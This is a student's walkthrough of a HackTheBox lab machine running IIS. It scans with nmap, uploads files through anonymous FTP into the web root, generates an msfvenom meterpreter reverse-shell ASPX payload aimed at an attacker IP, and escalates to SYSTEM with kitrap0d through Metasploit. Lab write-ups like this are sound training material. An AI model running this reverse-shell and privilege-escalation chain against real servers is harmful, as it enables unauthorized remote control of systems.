Hi! My name is Rupe and I am currently studying to be a Penetration Tester. I am going to be posting various walkthroughs of the boxes I complete along the way. This will not only help me learn the techniques and methodologies better but I hope it will also help someone down the road who is just starting out on the Pen Testing path.
Step 1 : Initial Scanning and Enumeration
HTB gives you the IP address of the machine when you spin it up. We will start with an NMAP scan to see what ports are open.
nmap -T4 -p- -A 10.10.10.5 -Pn
We can see that port 21 and port 80 are open. Port 21 is running file transfer protocol (ftp) and port 80 is running an IIS web server. Also note that anonymous login is allowed on port 21. This means we do not have to be an authenticated user to connect.
I logged into the ftp server using Username : anonymous and it was successful. Lets test and see if we are able to upload a file. To create the test file, use the following command :
echo "hello" > hello.txtNow we are going to try and upload this test file to the server.
We can verify to see if the file has been uploaded to the web server by going to the website and checking to see if our file is uploaded.
And there we go! The file has been uploaded. This means any file uploaded to FTP is available via the web server. Now why is this a problem? Well all we did was upload a simple .txt file… what if we made it malicious.
Step 2 : Exploitation
Doing some research I found out that you should test executable file extensions on an IIS server. The 4 main ones are asp, aspx, config, and php (https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-services). I chose to try aspx.
So now we will create a payload using msfvenom. Here is the command :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=4444 -f aspx > reverse.aspx
Now that the payload has been created, lets upload it via FTP.
The payload has been uploaded to the web server. Lets open up Metasploit to see if we can get a shell now.
Once you set up all of the options (exploit, payload, lhost, and lport) we can type in run and start listening. To pop a shell try to access the reverse.aspx file we uploaded to the web server.
Step 3 : Post-Exploitation / Privilege Escalation
And there we have it. We have gained a low level shell on the server. Lets do some enumeration and see what we do and don’t have access to.
After poking around, we do not have access to very much. Lets try and elevate our privileges using metasploits local_exploit_suggester (https://www.rapid7.com/blog/post/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/)
After running the local exploit suggester command, we can see that there are numerous exploits we could try. We will be using kitrap0d for this machine. Lets set up Metasploit to prepare for the kitrap0d exploit.
When we run this, the exploit launches and is successful. We are now NT AUTHORITY\SYSTEM
Lets try and access the Desktops of the users now.
Step 4 : Do a little Happy Dance since you found the root flag
As you can see we now have access to both babis’s desktop and the Administrator’s desktop.
The user flag can be found in c:\Users\babis\Desktop in the file user.txt
The root flag can be found in c:\Users\Administrator\Desktop in the file root.txt.
If I showed you the flags for HackTheBox that would be too easy. You can go find them :)
I am not a professional by any means. There are many different ways to complete this box, this is just the way I decided to do it. If you have any feedback or suggestions, feel free to let me know! Happy Hacking!
HTB Profile : https://app.hackthebox.com/profile/1463629
